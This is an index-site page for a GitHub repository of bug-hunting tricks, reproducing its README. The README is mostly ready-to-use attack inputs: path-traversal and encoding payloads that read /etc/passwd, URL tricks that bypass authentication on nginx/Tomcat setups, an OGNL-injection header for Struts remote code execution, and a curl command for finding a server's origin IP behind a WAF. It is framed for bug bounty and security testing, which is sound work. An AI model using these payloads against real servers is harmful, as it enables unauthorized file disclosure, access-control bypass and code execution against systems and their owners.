Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/venom26/recon
information gathering
https://github.com/venom26/recon
Last synced: 21 days ago
JSON representation
information gathering
- Host: GitHub
- URL: https://github.com/venom26/recon
- Owner: venom26
- Created: 2019-08-21T13:08:23.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2024-03-29T18:02:15.000Z (9 months ago)
- Last Synced: 2024-08-05T17:42:54.365Z (4 months ago)
- Language: Shell
- Size: 7.03 MB
- Stars: 270
- Watchers: 5
- Forks: 82
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - venom26/recon - information gathering (Shell)
README
**Bug Hunting Tricks**
**Extracting links, paths from source of a website**
```
Use Xidel
https://github.com/benibela/xidel
Usage:-
xidel http://apple.com -f '//script/@src'
xidel http://apple.com -f '//link/@href'
xidel http://apple.com -f '//a/@href'References:-
https://www.videlibri.de/xidel.html
```**Bypasses For LFI, Auth Bypass**
```
api/v1/..%2f
api/v1/..;/
api/v1/../
api/v1..%00/
api/v1/..%0d/
api/v1/..%5c
api/v1/..\
api/v1/..%ff/
api/v1/%2e%2e%2f
api/v1/.%2e/
api/v1/%3f (?)
api/v1/%26 (&)
api/v1/%23 (#)
or
/foo;x=x/bar/
above tricks work well when you have a ngnix server in front of an tomcat
References:- https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
``````
../../../../../../../../../../../../etc/passwd%00
//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%252e%252e%252fetc%252fpasswd
...//....//etc/passwd
..///////..////..//////etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./etc/passwd
/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd```
**Struts RCE**
```
Content-Type: ${#context["com.opensymphone.xwork2.dispatcher.HttpServletResponse"].addHeader("Struts-RCE",191*7)}.multipart/form-data
```**WAF**
```
#Finding Origin IP
Check IP address history from https://viewdns.info/
or use below command
curl 'https://api.viewdns.info/iphistory/?domain=&apikey=&output=json' -H 'User-Agent: Mozilla/5.0 Windows NT 10.0 Win64 AppleWebKit/537.36 Chrome/69.0.3497.100' | jq . | grep ip | cut -d '"' -f4 | tail -n+2
References:- https://twitter.com/yassineaboukir/status/932908449775669248
https://github.com/christophetd/CloudFlair
```